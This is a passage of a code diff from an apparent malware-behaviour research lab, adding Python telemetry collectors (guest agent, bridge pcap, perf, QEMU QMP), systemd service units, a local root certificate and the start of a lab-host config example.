"X-Cis490-Host-Id": host_id,
"X-Cis490-Cert-Source-IP": src,
},
)
routes = [
Route("/v1/health", health, methods=["GET"]),
Route("/v1/cert/{host_id}", get_cert, methods=["GET"]),
]
return Starlette(routes=routes)

119
collectors/guest_agent.py Normal file
View file

@ -0,0 +1,119 @@
"""Source 5 (feature, deployable): in-guest agent reader.
QEMU exposes a virtio-serial channel two ways:
- inside the guest: ``/dev/virtio-ports/cis490.guest.agent``
- on the host: a unix socket at ``$RUN_DIR/agent.sock``
The in-guest agent (`vm/guest-agent/cis490_agent.py`) writes one
JSON-lines row per tick into the guest-side device. Bytes traverse the
virtio bus and surface on the host socket. This collector reads them,
re-stamps with the host's monotonic clock (so rows align with all
other telemetry on a single timeline), and persists to
``telemetry-guest.jsonl``.
Why re-stamp? The agent's clock is the *guest* clock, which can drift
from the host (rare in KVM, but happens during live-migration tests
and on heavy host load). The original guest timestamps stay in the row
under ``t_guest_*`` so analysts can quantify drift if they care.
This source is the **deployable** side: every row is tagged
``available_in_deployment: true``. See docs/threat-model.md.
"""
from __future__ import annotations
import json
import logging
import socket
import threading
import time
from pathlib import Path
log = logging.getLogger("cis490.collectors.guest_agent")
SOURCE = "guest_agent"
AVAILABLE_IN_DEPLOYMENT = True
def _connect(socket_path: Path, timeout_s: float) -> socket.socket | None:
deadline = time.monotonic() + timeout_s
last_err: OSError | None = None
while time.monotonic() < deadline:
try:
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.settimeout(2.0)
s.connect(str(socket_path))
return s
except OSError as e:
last_err = e
time.sleep(0.5)
if last_err is not None:
log.warning("guest-agent socket %s never came up: %s", socket_path, last_err)
return None
def _stamp(row: dict, t_mono_origin_ns: int) -> dict:
"""Replace the agent's wall-only timestamps with host-clock ones,
keeping the originals under ``t_guest_*`` for drift analysis."""
out = dict(row)
out.setdefault("t_guest_mono_ns", row.get("t_guest_mono_ns"))
out.setdefault("t_guest_wall_ns", row.get("t_guest_wall_ns"))
out["t_mono_ns"] = time.monotonic_ns() - t_mono_origin_ns
out["t_wall_ns"] = time.time_ns()
out.setdefault("source", SOURCE)
out.setdefault("available_in_deployment", AVAILABLE_IN_DEPLOYMENT)
return out
def run_loop(
socket_path: str | Path,
output_path: Path,
t_mono_origin_ns: int,
stop_event: threading.Event,
*,
connect_timeout_s: float = 30.0,
) -> int:
"""Read agent JSON-lines from the host-side virtio-serial unix
socket. Re-stamp each row with the host clock and persist."""
sock_path = Path(socket_path)
sock = _connect(sock_path, connect_timeout_s)
if sock is None:
return 0
rows = 0
output_path.parent.mkdir(parents=True, exist_ok=True)
buf = b""
try:
with output_path.open("a", buffering=1) as f:
while not stop_event.is_set():
try:
sock.settimeout(0.5)
chunk = sock.recv(8192)
except socket.timeout:
continue
except OSError as e:
log.warning("guest-agent recv failed: %s", e)
break
if not chunk:
log.info("guest-agent socket closed")
break
buf += chunk
while b"\n" in buf:
line, _, buf = buf.partition(b"\n")
line = line.strip()
if not line:
continue
try:
row = json.loads(line)
except json.JSONDecodeError as e:
log.warning("dropping malformed guest-agent line: %s", e)
continue
f.write(json.dumps(_stamp(row, t_mono_origin_ns)) + "\n")
rows += 1
finally:
try:
sock.close()
except OSError:
pass
return rows

288
collectors/pcap.py Normal file
View file

@ -0,0 +1,288 @@
"""Source 4 (feature, deployable): bridge-side pcap + bucketed netflow.
Captures packets on the host-only ``br-malware`` bridge during an
episode, writes the raw pcap, and produces a bucketed JSONL file the
trainer can consume directly.
The capture is **gateway-side** the orchestrator sees the same
packets a real upstream router/gateway would see in deployment, so
features derived here transfer 1:1 to the deployment-time gateway
observer.
Implementation:
- ``run_capture()`` spawns ``tcpdump -i <bridge> -U -w <out.pcap>``
as a subprocess for the episode duration. ``-U`` flushes per
packet so the file is consumable mid-flight.
- ``bucketize()`` reads a finished pcap and emits 100 ms-bucketed
rows into ``netflow.jsonl``. Pure-Python pcap parser (no scapy /
dpkt dependency); decodes Ethernet + IPv4 + TCP/UDP enough to fill
the schema in docs/data-model.md.
The pure-Python parser is intentionally minimal it does NOT do
fragment reassembly, IPv6, VLAN tags, or anything fancy. It handles
the cases that occur on a host-only bridge for malware behaviour:
plain Ethernet II, IPv4, TCP/UDP. Other frames are still counted at
the byte/packet level but skipped for protocol-specific stats.
"""
from __future__ import annotations
import json
import logging
import os
import struct
import subprocess
import threading
import time
from collections import defaultdict
from dataclasses import dataclass
from pathlib import Path
log = logging.getLogger("cis490.collectors.pcap")
SOURCE = "bridge_pcap"
AVAILABLE_IN_DEPLOYMENT = True
# Pcap file-level header
_PCAP_GLOBAL_HDR = "<IHHiIII"
_PCAP_GLOBAL_HDR_SIZE = 24
_PCAP_REC_HDR = "<IIII"
_PCAP_REC_HDR_SIZE = 16
_PCAP_MAGIC_USEC = 0xa1b2c3d4
_PCAP_MAGIC_NSEC = 0xa1b23c4d # nanosecond resolution variant
# ---------------------------------------------------------------------------
# Capture
# ---------------------------------------------------------------------------
@dataclass
class CaptureHandle:
proc: subprocess.Popen
pcap_path: Path
bridge: str
started_mono_ns: int
def run_capture(
*,
bridge: str,
pcap_path: Path,
snaplen: int = 256,
bpf: str | None = None,
) -> CaptureHandle:
"""Start a tcpdump capture on ``bridge``. Returns a handle the
caller stops via ``stop_capture()``."""
pcap_path.parent.mkdir(parents=True, exist_ok=True)
args = ["tcpdump", "-i", bridge, "-U", "-s", str(snaplen), "-w", str(pcap_path)]
if bpf:
args.append(bpf)
log.info("starting pcap: %s", " ".join(args))
proc = subprocess.Popen(
args,
stdout=subprocess.DEVNULL,
stderr=subprocess.PIPE,
# tcpdump may need root or CAP_NET_RAW. We don't elevate here.
)
return CaptureHandle(
proc=proc, pcap_path=pcap_path, bridge=bridge,
started_mono_ns=time.monotonic_ns(),
)
def stop_capture(handle: CaptureHandle, *, timeout_s: float = 5.0) -> int:
"""SIGINT tcpdump (the Right Signal — flushes buffers + exits 0).
Returns the process exit code."""
proc = handle.proc
if proc.poll() is None:
proc.send_signal(2) # SIGINT
try:
proc.wait(timeout=timeout_s)
except subprocess.TimeoutExpired:
proc.kill()
proc.wait(timeout=timeout_s)
return proc.returncode
# ---------------------------------------------------------------------------
# Pure-Python pcap parser
# ---------------------------------------------------------------------------
def _iter_pcap(path: Path):
"""Yield ``(t_pkt_ns, frame_bytes)`` for every record in a pcap
file. Tolerates either microsecond or nanosecond magics."""
with path.open("rb") as f:
hdr = f.read(_PCAP_GLOBAL_HDR_SIZE)
if len(hdr) < _PCAP_GLOBAL_HDR_SIZE:
return
magic = struct.unpack("<I", hdr[:4])[0]
if magic == _PCAP_MAGIC_USEC:
sub_mult = 1000 # us → ns
elif magic == _PCAP_MAGIC_NSEC:
sub_mult = 1
else:
log.warning("unknown pcap magic %#x in %s", magic, path)
return
while True:
rec = f.read(_PCAP_REC_HDR_SIZE)
if len(rec) < _PCAP_REC_HDR_SIZE:
return
ts_sec, ts_sub, caplen, _ = struct.unpack(_PCAP_REC_HDR, rec)
data = f.read(caplen)
if len(data) < caplen:
return
t_ns = ts_sec * 1_000_000_000 + ts_sub * sub_mult
yield t_ns, data
def _decode(frame: bytes) -> dict:
"""Decode an Ethernet/IPv4/{TCP,UDP} frame to a flat dict. Unknown
protocols return only the ethertype + lengths."""
out: dict = {"size": len(frame)}
if len(frame) < 14:
return out
ethertype = struct.unpack(">H", frame[12:14])[0]
out["ethertype"] = ethertype
if ethertype != 0x0800: # not IPv4 — count, don't decode further
return out
ip = frame[14:]
if len(ip) < 20:
return out
ihl = (ip[0] & 0x0F) * 4
if ihl < 20 or len(ip) < ihl:
return out
proto = ip[9]
src = ip[12:16]
dst = ip[16:20]
out["ip_proto"] = proto
out["src_ip"] = ".".join(str(b) for b in src)
out["dst_ip"] = ".".join(str(b) for b in dst)
payload = ip[ihl:]
if proto == 6 and len(payload) >= 20: # TCP
sport, dport, _, _, off_flags = struct.unpack(">HHIIH", payload[:14])
flags = off_flags & 0x003F
out["src_port"] = sport
out["dst_port"] = dport
out["tcp_flags"] = flags # FIN=1 SYN=2 RST=4 PSH=8 ACK=16 URG=32
elif proto == 17 and len(payload) >= 8: # UDP
sport, dport, _, _ = struct.unpack(">HHHH", payload[:8])
out["src_port"] = sport
out["dst_port"] = dport
return out
def bucketize(
pcap_path: Path,
netflow_path: Path,
*,
bucket_ms: int = 100,
t_mono_origin_ns: int = 0,
bridge_ip: str = "10.200.0.1",
) -> int:
"""Read a pcap and emit one row per ``bucket_ms`` window into
``netflow.jsonl``. The ``in/out`` direction is from the bridge
perspective (host = ``bridge_ip``):
out = packet whose src is the host-side address (host guest)
in = anything else seen on the bridge (guest host or
guest-to-guest)
Returns the number of rows written."""
if not pcap_path.exists():
return 0
bucket_ns = bucket_ms * 1_000_000
netflow_path.parent.mkdir(parents=True, exist_ok=True)
rows = 0
bucket_start: int | None = None
agg: dict = _empty_bucket()
with netflow_path.open("a", buffering=1) as out:
for t_pkt_ns, frame in _iter_pcap(pcap_path):
d = _decode(frame)
# Establish first bucket origin on first packet.
if bucket_start is None:
bucket_start = t_pkt_ns - (t_pkt_ns % bucket_ns)
while t_pkt_ns >= bucket_start + bucket_ns:
_flush(out, agg, bucket_start, bucket_ns, t_mono_origin_ns)
rows += 1
agg = _empty_bucket()
bucket_start += bucket_ns
_accumulate(agg, d, bridge_ip)
if bucket_start is not None and any(v for v in agg.values() if v):
_flush(out, agg, bucket_start, bucket_ns, t_mono_origin_ns)
rows += 1
return rows
def _empty_bucket() -> dict:
return {
"pkts_in": 0, "pkts_out": 0,
"bytes_in": 0, "bytes_out": 0,
"syn_count": 0, "fin_count": 0, "rst_count": 0,
"udp_count": 0, "tcp_count": 0,
"dns_query_count": 0,
"dst_ips": set(), "dst_ports": set(),
"tcp_new_flows": 0,
}
def _accumulate(agg: dict, d: dict, bridge_ip: str) -> None:
sz = d.get("size", 0)
is_out = d.get("src_ip") == bridge_ip
if is_out:
agg["pkts_out"] += 1
agg["bytes_out"] += sz
else:
agg["pkts_in"] += 1
agg["bytes_in"] += sz
proto = d.get("ip_proto")
if proto == 6:
agg["tcp_count"] += 1
flags = d.get("tcp_flags", 0)
if flags & 0x02: # SYN
agg["syn_count"] += 1
if not (flags & 0x10): # SYN without ACK = new flow
agg["tcp_new_flows"] += 1
if flags & 0x01:
agg["fin_count"] += 1
if flags & 0x04:
agg["rst_count"] += 1
elif proto == 17:
agg["udp_count"] += 1
if d.get("dst_port") == 53:
agg["dns_query_count"] += 1
dst = d.get("dst_ip")
if dst:
agg["dst_ips"].add(dst)
dport = d.get("dst_port")
if dport is not None:
agg["dst_ports"].add(dport)
def _flush(out, agg: dict, bucket_start_ns: int, bucket_ns: int, t_mono_origin_ns: int) -> None:
row = {
"t_mono_ns": bucket_start_ns - t_mono_origin_ns,
"t_wall_ns": bucket_start_ns,
"source": SOURCE,
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
"bucket_ms": bucket_ns // 1_000_000,
"pkts_in": agg["pkts_in"], "pkts_out": agg["pkts_out"],
"bytes_in": agg["bytes_in"], "bytes_out": agg["bytes_out"],
"syn_count": agg["syn_count"],
"fin_count": agg["fin_count"],
"rst_count": agg["rst_count"],
"udp_count": agg["udp_count"],
"tcp_count": agg["tcp_count"],
"dns_query_count": agg["dns_query_count"],
"unique_dst_ips": len(agg["dst_ips"]),
"unique_dst_ports": len(agg["dst_ports"]),
"tcp_new_flows": agg["tcp_new_flows"],
}
out.write(json.dumps(row) + "\n")

201
collectors/perf_qemu.py Normal file
View file

@ -0,0 +1,201 @@
"""Source 3 (oracle): ``perf stat -p <qemu_pid>`` sampler.
Spawns ``perf stat`` in interval-JSON mode against the qemu pid and
aggregates the per-event counter values into per-interval telemetry
rows. Unlike the /proc and QMP collectors, perf needs CAP_SYS_ADMIN
or ``kernel.perf_event_paranoid <= 1`` to read counters for a process
the collector doesn't own — typically true on a lab host running
QEMU under the cis490 service user.
Source 3 is **oracle-only** perf counters are not available on a
deployed device. Every row carries ``available_in_deployment: false``.
The events we ask for are the small canonical set named in
docs/data-model.md:
cycles, instructions, cache-references, cache-misses,
branches, branch-misses, page-faults, context-switches
Anything perf can't enable on the host (e.g. cache-misses without
hardware support) is silently dropped from the row.
"""
from __future__ import annotations
import json
import logging
import shutil
import subprocess
import threading
import time
from pathlib import Path
log = logging.getLogger("cis490.collectors.perf_qemu")
SOURCE = "host_perf"
AVAILABLE_IN_DEPLOYMENT = False
DEFAULT_EVENTS = (
"cycles",
"instructions",
"cache-references",
"cache-misses",
"branches",
"branch-misses",
"page-faults",
"context-switches",
)
def perf_available() -> bool:
return shutil.which("perf") is not None
def _coerce_int(s: str | int | None) -> int | None:
if s is None:
return None
if isinstance(s, int):
return s
s = s.strip()
if not s or s in ("<not counted>", "<not supported>"):
return None
# perf prints comma-separated thousands by default; we asked -j so
# we usually get plain numbers, but guard for both shapes.
s = s.replace(",", "")
try:
return int(s)
except ValueError:
try:
return int(float(s))
except ValueError:
return None
def _build_row(t_mono_origin_ns: int, interval_s: float, agg: dict[str, int]) -> dict:
cycles = agg.get("cycles")
insns = agg.get("instructions")
cache_refs = agg.get("cache-references")
cache_miss = agg.get("cache-misses")
ipc = (insns / cycles) if (cycles and insns) else None
miss_rate = (cache_miss / cache_refs) if (cache_refs and cache_miss is not None) else None
return {
"t_mono_ns": time.monotonic_ns() - t_mono_origin_ns,
"t_wall_ns": time.time_ns(),
"source": SOURCE,
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
"interval_s": interval_s,
"cycles": cycles,
"instructions": insns,
"cache_references": cache_refs,
"cache_misses": cache_miss,
"branches": agg.get("branches"),
"branch_misses": agg.get("branch-misses"),
"page_faults": agg.get("page-faults"),
"context_switches": agg.get("context-switches"),
"ipc": ipc,
"cache_miss_rate": miss_rate,
}
def parse_perf_event_line(line: str) -> dict | None:
"""Parse one ``perf stat -j`` event line. Returns None for blanks
or status messages perf occasionally interleaves on stderr-ish
paths but stdout-on-error in practice."""
line = line.strip()
if not line.startswith("{"):
return None
try:
return json.loads(line)
except json.JSONDecodeError:
return None
def run_loop(
pid: int,
output_path: Path,
t_mono_origin_ns: int,
interval_ms: int,
stop_event: threading.Event,
*,
events: tuple[str, ...] = DEFAULT_EVENTS,
) -> int:
"""Spawn perf stat -j against ``pid`` and stream rows until stop.
Returns the number of rows written."""
if not perf_available():
log.warning("perf binary not on PATH — perf collector disabled")
return 0
cmd = [
"perf", "stat",
"-p", str(pid),
"-I", str(interval_ms),
"-j",
"-e", ",".join(events),
]
log.info("starting perf: %s", " ".join(cmd))
try:
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=1,
text=True,
)
except (FileNotFoundError, PermissionError) as e:
log.warning("perf launch failed: %s", e)
return 0
rows = 0
output_path.parent.mkdir(parents=True, exist_ok=True)
cur_interval: float | None = None
agg: dict[str, int] = {}
def _flush() -> None:
nonlocal rows
if cur_interval is None or not agg:
return
row = _build_row(t_mono_origin_ns, cur_interval, agg)
out_f.write(json.dumps(row) + "\n")
rows += 1
try:
with output_path.open("a", buffering=1) as out_f:
# perf interleaves events and writes to stdout in -j mode.
# We read line by line until the process exits (which
# happens when we kill it on stop, or when the target pid
# disappears and perf's internal -p polling notices).
assert proc.stdout is not None
for line in proc.stdout:
if stop_event.is_set():
break
evt = parse_perf_event_line(line)
if evt is None:
continue
interval = evt.get("interval")
event_name = evt.get("event")
value = _coerce_int(evt.get("counter-value"))
if interval is None or event_name is None:
continue
# perf emits one JSON per (event, interval); a new
# interval value means we should flush the previous row.
if cur_interval is not None and interval != cur_interval:
_flush()
agg = {}
cur_interval = interval
if value is not None:
agg[event_name] = value
# End of stream — flush the last partial row.
_flush()
finally:
if proc.poll() is None:
proc.terminate()
try:
proc.wait(timeout=3.0)
except subprocess.TimeoutExpired:
proc.kill()
proc.wait(timeout=2.0)
return rows

262
collectors/qmp.py Normal file
View file

@ -0,0 +1,262 @@
"""Source 2 (oracle): QEMU QMP sampler.
Connects to the QEMU monitor protocol socket exposed by the launcher
($RUN_DIR/qmp.sock) and periodically queries the hypervisor for
per-VM stats that don't show up in /proc/<qemu_pid>:
- per-disk block I/O (rd_bytes, wr_bytes, rd_ops, wr_ops)
- VM run state (running / paused / shutdown)
- per-netdev tx/rx counters (when available)
- KVM stat counters (when available; introspection differs by qemu
version, so anything we can't read is skipped silently)
This source is **oracle-only** it does not exist on a deployed
device. Every row carries ``available_in_deployment: false``.
Wire format: QMP is line-delimited JSON. The handshake is fixed:
server {"QMP": {capabilities: [...], version: ...}}
client {"execute": "qmp_capabilities"}
server {"return": {}}
(client may now issue commands)
We use a dedicated synchronous client because QMP is request/response
and we don't need pipelining; one query batch per tick keeps the
on-disk schema simple.
"""
from __future__ import annotations
import json
import logging
import socket
import threading
import time
from dataclasses import dataclass
from pathlib import Path
from typing import Any
log = logging.getLogger("cis490.collectors.qmp")
SOURCE = "host_qmp"
AVAILABLE_IN_DEPLOYMENT = False
class QMPError(RuntimeError):
pass
@dataclass
class _SockReader:
sock: socket.socket
buf: bytes = b""
def read_line(self, timeout_s: float = 5.0) -> str:
deadline = time.monotonic() + timeout_s
while b"\n" not in self.buf:
self.sock.settimeout(max(0.1, deadline - time.monotonic()))
try:
chunk = self.sock.recv(8192)
except socket.timeout as e:
raise QMPError(f"QMP read timed out: {e}") from e
if not chunk:
raise QMPError("QMP connection closed by peer")
self.buf += chunk
line, _, rest = self.buf.partition(b"\n")
self.buf = rest
return line.decode("utf-8", errors="replace")
class QMPClient:
"""Tiny synchronous QMP client over a unix socket."""
def __init__(self, socket_path: str | Path) -> None:
self.path = str(socket_path)
self._sock: socket.socket | None = None
self._reader: _SockReader | None = None
def connect(self, timeout_s: float = 5.0) -> dict[str, Any]:
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.settimeout(timeout_s)
s.connect(self.path)
self._sock = s
self._reader = _SockReader(s)
# Read greeting.
greeting = json.loads(self._reader.read_line(timeout_s=timeout_s))
if "QMP" not in greeting:
raise QMPError(f"unexpected QMP greeting: {greeting!r}")
# Negotiate capabilities (no flags requested).
self.execute("qmp_capabilities")
return greeting["QMP"]
def execute(self, command: str, **arguments: Any) -> Any:
if self._sock is None or self._reader is None:
raise QMPError("not connected")
msg: dict[str, Any] = {"execute": command}
if arguments:
msg["arguments"] = arguments
body = (json.dumps(msg) + "\n").encode("utf-8")
self._sock.sendall(body)
# QMP can interleave async events with the response — drain
# until we see the matching {"return": ...} or {"error": ...}.
for _ in range(64): # bounded to avoid an infinite loop on bugs
line = self._reader.read_line()
if not line.strip():
continue
resp = json.loads(line)
if "return" in resp:
return resp["return"]
if "error" in resp:
raise QMPError(f"{command}: {resp['error']}")
# Otherwise it's an async event; ignore and keep reading.
raise QMPError(f"{command}: too many async events without a response")
# ---- snapshot / revert (via human-monitor-command) -----------------
def savevm(self, name: str) -> str:
"""``savevm <name>`` — capture a live VM snapshot inside the
qcow2. Returns the monitor's reply (empty string on success).
Requires the disk to be qcow2 (our launchers always are)."""
return self._hmp(f"savevm {name}")
def loadvm(self, name: str) -> str:
"""``loadvm <name>`` — restore the named snapshot. The guest
is paused, restored, and resumed; collectors continue
sampling and just see a sharp transition."""
return self._hmp(f"loadvm {name}")
def _hmp(self, cmd: str) -> str:
out = self.execute("human-monitor-command", **{"command-line": cmd})
return out if isinstance(out, str) else ""
def close(self) -> None:
if self._sock is not None:
try:
self._sock.close()
except OSError:
pass
self._sock = None
self._reader = None
# ---- row builders ----------------------------------------------------------
def _flatten_blockstats(blockstats: list[dict] | None) -> dict[str, dict[str, int]]:
"""Compact ``query-blockstats`` to ``{device: {rd_ops, wr_ops, ...}}``."""
out: dict[str, dict[str, int]] = {}
for entry in blockstats or []:
name = entry.get("device") or entry.get("qdev") or "unknown"
s = entry.get("stats") or {}
out[name] = {
"rd_ops": int(s.get("rd_operations", 0)),
"wr_ops": int(s.get("wr_operations", 0)),
"rd_bytes": int(s.get("rd_bytes", 0)),
"wr_bytes": int(s.get("wr_bytes", 0)),
"flush_ops": int(s.get("flush_operations", 0)),
}
return out
def collect_once(client: QMPClient, t_mono_origin_ns: int) -> dict[str, Any]:
row: dict[str, Any] = {
"t_mono_ns": time.monotonic_ns() - t_mono_origin_ns,
"t_wall_ns": time.time_ns(),
"source": SOURCE,
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
}
# query-status is dirt cheap and tells us whether the guest is
# paused (rare) or running.
try:
status = client.execute("query-status")
row["vm_status"] = status.get("status")
row["vm_running"] = bool(status.get("running"))
except QMPError as e:
log.debug("query-status failed: %s", e)
try:
bs = client.execute("query-blockstats")
row["blockstats"] = _flatten_blockstats(bs)
except QMPError as e:
log.debug("query-blockstats failed: %s", e)
# query-stats is QEMU 7.1+ and the schema varies across versions.
# We only ask for KVM stats and tolerate any subset of fields.
try:
stats = client.execute("query-stats", target="vm")
row["kvm_stats"] = _summarize_query_stats(stats)
except QMPError as e:
log.debug("query-stats not supported: %s", e)
return row
def _summarize_query_stats(stats_resp: list[dict] | dict) -> dict[str, int]:
"""Reduce ``query-stats`` to a flat name→value map of integer
counters. The full payload is verbose and version-specific; we only
ever want individual scalar counters downstream."""
flat: dict[str, int] = {}
items = stats_resp if isinstance(stats_resp, list) else [stats_resp]
for entry in items:
for s in entry.get("stats", []) or []:
name = s.get("name")
value = s.get("value")
if isinstance(name, str) and isinstance(value, int):
flat[name] = value
return flat
# ---- run loop --------------------------------------------------------------
def run_loop(
socket_path: str | Path,
output_path: Path,
t_mono_origin_ns: int,
interval_ms: int,
stop_event: threading.Event,
) -> int:
"""Connect to ``socket_path`` and sample at ``interval_ms`` until
``stop_event``. Returns the number of rows written.
A single missed sample (transient QMP error) is logged and skipped;
repeated failures terminate the loop so the episode finishes cleanly
rather than hanging on a dead hypervisor."""
interval_ns = interval_ms * 1_000_000
client = QMPClient(socket_path)
try:
client.connect(timeout_s=5.0)
except (OSError, QMPError) as e:
log.warning("QMP connect to %s failed: %s — collector exits cleanly", socket_path, e)
return 0
rows = 0
consecutive_failures = 0
next_tick = time.monotonic_ns()
output_path.parent.mkdir(parents=True, exist_ok=True)
try:
with output_path.open("a", buffering=1) as f:
while not stop_event.is_set():
try:
row = collect_once(client, t_mono_origin_ns)
f.write(json.dumps(row) + "\n")
rows += 1
consecutive_failures = 0
except (QMPError, OSError) as e:
consecutive_failures += 1
log.warning("QMP sample %d failed: %s", rows, e)
if consecutive_failures >= 5:
log.warning("5 consecutive QMP failures; bailing")
break
next_tick += interval_ns
sleep_ns = next_tick - time.monotonic_ns()
if sleep_ns > 0:
stop_event.wait(sleep_ns / 1_000_000_000)
else:
next_tick = time.monotonic_ns()
finally:
client.close()
return rows

View file

@ -171,6 +171,10 @@ thing plays in our pipeline.
- **pycdlib** — pure-Python ISO9660/Joliet/Rock Ridge builder. Used to
produce the NoCloud cidata ISO without depending on system mkisofs/
xorriso. https://clalancette.github.io/pycdlib/
- **msgpack** — binary serialization used by Metasploit's RPC API. The
Tier-3 driver speaks msfrpcd's native msgpack-over-HTTPS so we don't
pull in a higher-level Metasploit Python client.
https://msgpack.org
---

11
etc/caddy-root.crt Normal file
View file

@ -0,0 +1,11 @@
-----BEGIN CERTIFICATE-----
MIIBpDCCAUqgAwIBAgIRAP15YNZS/guq4ES7RfuBBQQwCgYIKoZIzj0EAwIwMDEu
MCwGA1UEAxMlQ2FkZHkgTG9jYWwgQXV0aG9yaXR5IC0gMjAyNiBFQ0MgUm9vdDAe
Fw0yNjA0MjYxMzE5NTZaFw0zNjAzMDQxMzE5NTZaMDAxLjAsBgNVBAMTJUNhZGR5
IExvY2FsIEF1dGhvcml0eSAtIDIwMjYgRUNDIFJvb3QwWTATBgcqhkjOPQIBBggq
hkjOPQMBBwNCAASjU+sJ+rLPPtTK5t7MsKa6/WDknumPOgxy7uGwGATkd65cHTjz
zTH6+0+uJ7LPZFTJoPSB5WVHrEA0veY8AxH5o0UwQzAOBgNVHQ8BAf8EBAMCAQYw
EgYDVR0TAQH/BAgwBgEB/wIBATAdBgNVHQ4EFgQU8EarYtjVc2EvpYE6OPhDQlYB
docwCgYIKoZIzj0EAwIDSAAwRQIhANxALV9oKSAC4JEB/w1EctnzMfzLyueBpGoB
7p5I07LRAiAKQuhNMeTDSK3Qql+IjunH8UPidETNXfyInwMnbzgAaQ==
-----END CERTIFICATE-----

View file

@ -0,0 +1,44 @@
[Unit]
Description=CIS490 mTLS bootstrap endpoint (auto-issue client certs to enrolled lab hosts)
Documentation=https://maxgit.wg/spectral/CIS490
After=network-online.target
Wants=network-online.target
[Service]
Type=simple
# Runs as root because the wg-pki CA private key is root-only. The
# service shells out to issue-cis490-client-cert.sh per mint and
# never touches anything else under /var/lib.
User=root
Group=root
WorkingDirectory=/opt/cis490
ExecStart=/opt/cis490/.venv/bin/python -m bootstrap \
--listen-host 127.0.0.1 \
--listen-port 8446 \
--issuer-script /opt/wg-pki/scripts/issue-cis490-client-cert-wrapper.sh \
--issued-root /var/lib/wg-pki/issued
Restart=on-failure
RestartSec=5
# Hardening — narrower than receiver because this binary's only job
# is to call openssl + tar via the issuer script, then serve files.
NoNewPrivileges=true
PrivateTmp=true
ProtectSystem=strict
# /home/max/.env/wg-pki/scripts/ holds the issuer script the wrapper
# exec's. ProtectHome={read-only,tmpfs} both *hide* /home contents
# instead of restricting them to read-only — so we leave /home
# accessible. ProtectSystem=strict still keeps everything outside
# /var/lib/wg-pki write-protected.
ProtectHome=no
ReadWritePaths=/var/lib/wg-pki
ProtectKernelTunables=true
ProtectKernelModules=true
ProtectControlGroups=true
LockPersonality=true
RestrictNamespaces=true
RestrictRealtime=true
SystemCallArchitectures=native
[Install]
WantedBy=multi-user.target

View file

@ -1,33 +1,46 @@
[Unit]
Description=CIS490 episode campaign runner
Description=CIS490 lab-host episode orchestrator (fleet mode)
Documentation=https://maxgit.wg/spectral/CIS490
After=network-online.target
# Episodes need KVM. msfrpcd (for Tier 3+) is brought up out-of-band
# by cis490-msfrpcd.service when installed.
After=network-online.target wg-quick@wg0.service
Wants=network-online.target
[Service]
Type=simple
User=cis490
Group=cis490
SupplementaryGroups=kvm
WorkingDirectory=/opt/cis490
ExecStart=/opt/cis490/.venv/bin/python tools/run_campaign.py \
# /etc/cis490/lab-host.env is written by scripts/install-lab-host.sh;
# carries FLEET_HOST_ID, BRIDGE, and any operator-supplied overrides.
EnvironmentFile=/etc/cis490/lab-host.env
# Fleet mode: detect host capacity, run that many concurrent episodes
# per wave with samples drawn from the manifest. Each invocation runs
# one wave and exits; systemd respawns per Restart= below, giving us
# a continuous stream of fresh-sample episodes per host. The shipper
# picks them up as `done.marker` files appear.
ExecStart=/opt/cis490/.venv/bin/python /opt/cis490/tools/run_fleet.py \
--data-root /var/lib/cis490/data \
--target 100
Restart=on-failure
RestartSec=10
--manifest /opt/cis490/samples/manifest.toml \
--waves 1
Restart=always
RestartSec=15
# Hardening
NoNewPrivileges=true
PrivateTmp=false
# Hardening — explicitly grant CAP_NET_RAW for tcpdump (source 4) and
# CAP_SYS_ADMIN / CAP_PERFMON for perf (source 3) when the operator
# enables those. Both are inherited by per-episode subprocesses.
# NoNewPrivileges=false is required because AmbientCapabilities only
# survives across exec() if NNP is off.
NoNewPrivileges=false
PrivateTmp=true
ProtectSystem=strict
ProtectHome=true
ReadWritePaths=/var/lib/cis490 /tmp/cis490-vm /dev/kvm
ProtectKernelTunables=true
ProtectKernelModules=true
ProtectControlGroups=true
LockPersonality=true
RestrictRealtime=true
SystemCallArchitectures=native
# /tmp is needed for per-slot RUN_DIR (cis490-vm-fleet-<slot>) — the
# fleet runner stages QEMU's sockets + pidfile there.
ReadWritePaths=/var/lib/cis490 /tmp
SupplementaryGroups=kvm
AmbientCapabilities=CAP_NET_RAW CAP_NET_ADMIN CAP_SYS_ADMIN CAP_PERFMON
CapabilityBoundingSet=CAP_NET_RAW CAP_NET_ADMIN CAP_SYS_ADMIN CAP_PERFMON CAP_DAC_READ_SEARCH
[Install]
WantedBy=multi-user.target

View file

@ -1,23 +1,19 @@
[Unit]
Description=CIS490 episode shipper
Description=CIS490 lab-host episode shipper
Documentation=https://maxgit.wg/spectral/CIS490
After=network-online.target cis490-orchestrator.service
# WG must be up before the shipper can reach the receiver.
After=network-online.target wg-quick@wg0.service
Wants=network-online.target
Requires=wg-quick@wg0.service
[Service]
Type=simple
User=cis490
Group=cis490
WorkingDirectory=/opt/cis490
ExecStart=/opt/cis490/.venv/bin/python tools/shipper.py \
--data-root /var/lib/cis490/data \
--receiver-url https://collector.wg \
--host-id lab-host-1 \
--ca-bundle /etc/cis490/certs/wg-ca.pem \
--client-cert /etc/cis490/certs/lab-host-1.pem \
--client-key /etc/cis490/certs/lab-host-1.key
ExecStart=/opt/cis490/.venv/bin/python -m shipper --config /etc/cis490/lab-host.toml
Restart=on-failure
RestartSec=10
RestartSec=5
# Hardening
NoNewPrivileges=true
@ -29,6 +25,7 @@ ProtectKernelTunables=true
ProtectKernelModules=true
ProtectControlGroups=true
LockPersonality=true
RestrictNamespaces=true
RestrictRealtime=true
SystemCallArchitectures=native

50
etc/lab-host.toml.example Normal file
View file

@ -0,0 +1,50 @@
# CIS490 lab-host — copy to /etc/cis490/lab-host.toml and edit.
#
# This config drives BOTH the orchestrator (which runs episodes) and
# the shipper (which uploads completed episodes to the central
# receiver over WG).
# Stable identity for this lab host. Used in the receiver path
# (/v1/episodes/<host_id>/...) and in the X-Lab-Host header. Pick
# something short, stable, and DNS-safe — letters, digits, _.- only.
host_id = "REPLACE_ME"
[paths]
data_root = "/var/lib/cis490/data"
samples_store = "/var/lib/cis490/samples/store"
qcow_image = "/var/lib/cis490/vm/images/metasploitable2.qcow2"
[receiver]
